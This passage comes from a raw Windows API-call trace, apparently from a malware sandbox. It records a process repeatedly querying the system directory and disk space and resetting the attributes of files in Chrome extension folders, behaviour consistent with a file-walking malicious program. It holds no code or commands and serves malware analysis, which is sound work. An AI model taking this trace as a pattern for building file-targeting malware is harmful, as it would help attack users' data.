Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\128.png", dwFileAttributes=0x80) returned 1 [0141.031] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.031] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.032] CoTaskMemFree (pv=0x4e1c10) [0141.036] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.037] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.037] CoTaskMemFree (pv=0x4e1c10) [0141.038] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.038] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.039] CoTaskMemFree (pv=0x4e1c10) [0141.039] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.039] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.039] CoTaskMemFree (pv=0x4e1c10) [0141.040] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.040] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.040] CoTaskMemFree (pv=0x4e1c10) [0141.041] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.041] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.041] CoTaskMemFree (pv=0x4e1c10) [0141.042] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.042] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.042] CoTaskMemFree (pv=0x4e1c10) [0141.043] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.043] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.043] CoTaskMemFree (pv=0x4e1c10) [0141.044] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.044] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.044] CoTaskMemFree (pv=0x4e1c10) [0141.045] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.045] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.045] CoTaskMemFree (pv=0x4e1c10) [0141.046] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.046] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.046] CoTaskMemFree (pv=0x4e1c10) [0141.047] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.047] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.047] CoTaskMemFree (pv=0x4e1c10) [0141.048] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.048] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.048] CoTaskMemFree (pv=0x4e1c10) [0141.048] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.048] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.049] CoTaskMemFree (pv=0x4e1c10) [0141.049] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.050] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.050] CoTaskMemFree (pv=0x4e1c10) [0141.050] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.050] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.050] CoTaskMemFree (pv=0x4e1c10) [0141.051] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.051] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.052] CoTaskMemFree (pv=0x4e1c10) [0141.052] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.052] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.052] CoTaskMemFree (pv=0x4e1c10) [0141.053] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.053] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.054] CoTaskMemFree (pv=0x4e1c10) [0141.054] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.054] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.054] CoTaskMemFree (pv=0x4e1c10) [0141.058] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.058] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.058] CoTaskMemFree (pv=0x4e1c10) [0141.058] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.059] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.059] CoTaskMemFree (pv=0x4e1c10) [0141.060] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.060] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.060] CoTaskMemFree (pv=0x4e1c10) [0141.061] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.061] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.061] CoTaskMemFree (pv=0x4e1c10) [0141.062] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.062] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.062] CoTaskMemFree (pv=0x4e1c10) [0141.063] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.063] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.063] CoTaskMemFree (pv=0x4e1c10) [0141.064] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.064] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.064] CoTaskMemFree (pv=0x4e1c10) [0141.065] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.065] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.065] CoTaskMemFree (pv=0x4e1c10) [0141.066] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.066] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.066] CoTaskMemFree (pv=0x4e1c10) [0141.067] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.067] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.067] CoTaskMemFree (pv=0x4e1c10) [0141.067] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.067] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.068] CoTaskMemFree (pv=0x4e1c10) [0141.069] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.069] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.069] CoTaskMemFree (pv=0x4e1c10) [0141.070] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.070] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.070] CoTaskMemFree (pv=0x4e1c10) [0141.071] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.071] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.071] CoTaskMemFree (pv=0x4e1c10) [0141.072] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.072] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.072] CoTaskMemFree (pv=0x4e1c10) [0141.073] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.073] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.073] CoTaskMemFree (pv=0x4e1c10) [0141.074] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.074] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.074] CoTaskMemFree (pv=0x4e1c10) [0141.075] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.075] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.075] CoTaskMemFree (pv=0x4e1c10) [0141.075] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.075] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.076] CoTaskMemFree (pv=0x4e1c10) [0141.076] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.077] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.077] CoTaskMemFree (pv=0x4e1c10) [0141.077] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.077] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.077] CoTaskMemFree (pv=0x4e1c10) [0141.078] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.078] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.079] CoTaskMemFree (pv=0x4e1c10) [0141.079] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.079] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.079] CoTaskMemFree (pv=0x4e1c10) [0141.080] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.080] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.080] CoTaskMemFree (pv=0x4e1c10) [0141.081] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.081] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.081] CoTaskMemFree (pv=0x4e1c10) [0141.081] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.081] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.082] CoTaskMemFree (pv=0x4e1c10) [0141.083] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.083] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.083] CoTaskMemFree (pv=0x4e1c10) [0141.084] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.084] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.085] CoTaskMemFree (pv=0x4e1c10) [0141.085] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.085] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.085] CoTaskMemFree (pv=0x4e1c10) [0141.086] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.086] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.086] CoTaskMemFree (pv=0x4e1c10) [0141.087] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.087] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.087] CoTaskMemFree (pv=0x4e1c10) [0141.088] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.088] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.088] CoTaskMemFree (pv=0x4e1c10) [0141.089] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.089] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.089] CoTaskMemFree (pv=0x4e1c10) [0141.090] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.090] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.090] CoTaskMemFree (pv=0x4e1c10) [0141.091] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.091] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.091] CoTaskMemFree (pv=0x4e1c10) [0141.092] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.092] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.092] CoTaskMemFree (pv=0x4e1c10) [0141.092] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.093] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.093] CoTaskMemFree (pv=0x4e1c10) [0141.094] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.094] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.094] CoTaskMemFree (pv=0x4e1c10) [0141.094] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.094] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.095] CoTaskMemFree (pv=0x4e1c10) [0141.095] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.096] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.096] CoTaskMemFree (pv=0x4e1c10) [0141.096] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.096] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.096] CoTaskMemFree (pv=0x4e1c10) [0141.097] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.097] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.098] CoTaskMemFree (pv=0x4e1c10) [0141.098] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.098] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.098] CoTaskMemFree (pv=0x4e1c10) [0141.099] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.099] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.100] CoTaskMemFree (pv=0x4e1c10) [0141.100] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.100] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.100] CoTaskMemFree (pv=0x4e1c10) [0141.101] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.101] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.101] CoTaskMemFree (pv=0x4e1c10) [0141.102] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.102] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.102] CoTaskMemFree (pv=0x4e1c10) [0141.103] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.103] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.103] CoTaskMemFree (pv=0x4e1c10) [0141.104] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.104] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.104] CoTaskMemFree (pv=0x4e1c10) [0141.105] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.105] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.105] CoTaskMemFree (pv=0x4e1c10) [0141.106] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.106] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.106] CoTaskMemFree (pv=0x4e1c10) [0141.114] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.115] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.115] CoTaskMemFree (pv=0x4e1c10) [0141.116] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.116] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.116] CoTaskMemFree (pv=0x4e1c10) [0141.120] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.123] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.123] CoTaskMemFree (pv=0x4e1c10) [0141.125] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.125] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.125] CoTaskMemFree (pv=0x4e1c10) [0141.126] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.131] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\html\\craw_window.html", dwFileAttributes=0x80) returned 1 [0141.133] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.133] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.134] CoTaskMemFree (pv=0x4e1c10) [0141.137] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.142] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png", dwFileAttributes=0x80) returned 1 [0141.145] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.149] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png", dwFileAttributes=0x80) returned 1 [0141.152] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.156] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png", dwFileAttributes=0x80) returned 1 [0141.159] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.163] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_close.png", dwFileAttributes=0x80) returned 1 [0141.166] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.170] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png", dwFileAttributes=0x80) returned 1 [0141.174] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.179] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_maximize.png", dwFileAttributes=0x80) returned 1 [0141.182] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c | out: lpFreeBytesAvailableToCaller=0x2aef9c, lpTotalNumberOfBytes=0x2aef94, lpTotalNumberOfFreeBytes=0x2aef8c) returned 1 [0141.186] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_pressed.png", dwFileAttributes=0x80) returned 1 [0141.189] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.189] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.189] CoTaskMemFree (pv=0x4e1c10) [0141.193] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.193] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.193] CoTaskMemFree (pv=0x4e1c10) [0141.194] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.194] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.194] CoTaskMemFree (pv=0x4e1c10) [0141.197] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.197] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.197] CoTaskMemFree (pv=0x4e1c10) [0141.198] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.198] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.198] CoTaskMemFree (pv=0x4e1c10) [0141.199] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.199] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.199] CoTaskMemFree (pv=0x4e1c10) [0141.200] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0141.200] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0141.200] CoTaskMemFree (pv=0x4e1c10) [0141.222] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0141.227] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png", dwFileAttributes=0x80) returned 1 [0141.257] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0141.266] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html", dwFileAttributes=0x80) returned 1 [0141.269] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0141.276] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 